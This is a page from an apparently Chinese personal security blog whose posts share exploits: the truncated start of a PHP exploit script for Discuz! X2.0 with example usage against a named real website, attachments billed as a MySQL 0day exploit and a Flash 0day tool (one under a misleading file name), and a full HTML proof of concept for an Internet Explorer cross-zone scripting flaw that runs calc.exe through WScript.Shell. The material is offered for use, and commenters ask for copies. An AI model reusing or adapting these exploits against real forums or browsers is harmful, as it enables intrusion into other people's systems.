<?php
echo ”Discuz! X2.0 0day EXP\n”;
echo ”By:Steeltiger \n”;
echo ”php.exe dz2exp.php http://www.bbyoo.com/ admin\n”;
if(!empty($argv[1]) &&!empty($argv[2]))
{
echo ”Start\n”;
...-
Discuz! X 2 0Day
[资源共享]post by Holmesian / 2011-6-28 14:09 Tuesday -
最新MySQL 0day利用代码
[FreeBSD]post by Holmesian / 2010-1-27 19:03 Wednesdaypython环境下使用
RT[sfile][/sfile]
附件下载:
mysql20100127_0day.py.txt 255字节 -
Flash0Day利用工具
[资源共享]post by Holmesian / 2008-6-2 21:14 MondayFlash0Day利用工具
网上找的 没时间看 有空看看
[file][/file]附件下载:
桥涵工程施工汇总.zip 255字节 -
Flash浏览器插件版本检测自动更新程序
post by Holmesian / 2008-6-2 20:43 Monday最近flash漏洞比较猖狂的说,昨天拿到0day样本,今天就听到朋友说有机子中招。
正好从网上找了个叫做SWFObject的小工具,做了个flash在线自动更新的东东,share下了。
测试地址:http://www.holmesian.org/flash/index.htm
程序下载:http://www.holmesian.org/flash/flash.rar
使用方法:
var so = new SWFObject("so_tester.swf", "sotester", "300", "300", "9.0.124", "#FF6600");
将9.0.124更新为最新的flash版本号,浏览者看到即会自动更新了。附件下载:
WEB security.zip 255字节 -
最新Vista下的IE 0Day漏洞
post by Holmesian / 2008-5-20 2:56 TuesdayVista下的0Day漏洞
ASLR+DEP+UAC+PatchGuard+IE7(+IE8保护模式)+安全的1b的 Office2007+...
超级安全的架构 终于露出一点问题了。。。。
MS Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx
如果启用了 "Print Table of Links",在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它 :)
重现:
1.下面这个地方打上勾
2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。
[quote]<html>
<body >
Print me with table of links to execute calc.exe
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>[/quote]
-
日历
-
搜索
-
最新吐槽
- WAWA
学习了。。。 - fire
楼主:能不能发给我一份,我下... - xrffyf
顶啊 - juck
解决了 有效~ - Emily
强大! - Holmesian
@youstar:已经换好了~ - youstar
帮忙把友情链接更换一下,谢谢... - haizhen2020
非常感谢!支持楼主!顶!!!... - 日新小胖
@Holmesian:额,懂了。 我去关注... - Holmesian
@KEEPER:关于南昌星空极速Netkeepe...
- WAWA
-
分类
-
链接
-
随便看看
-
AD
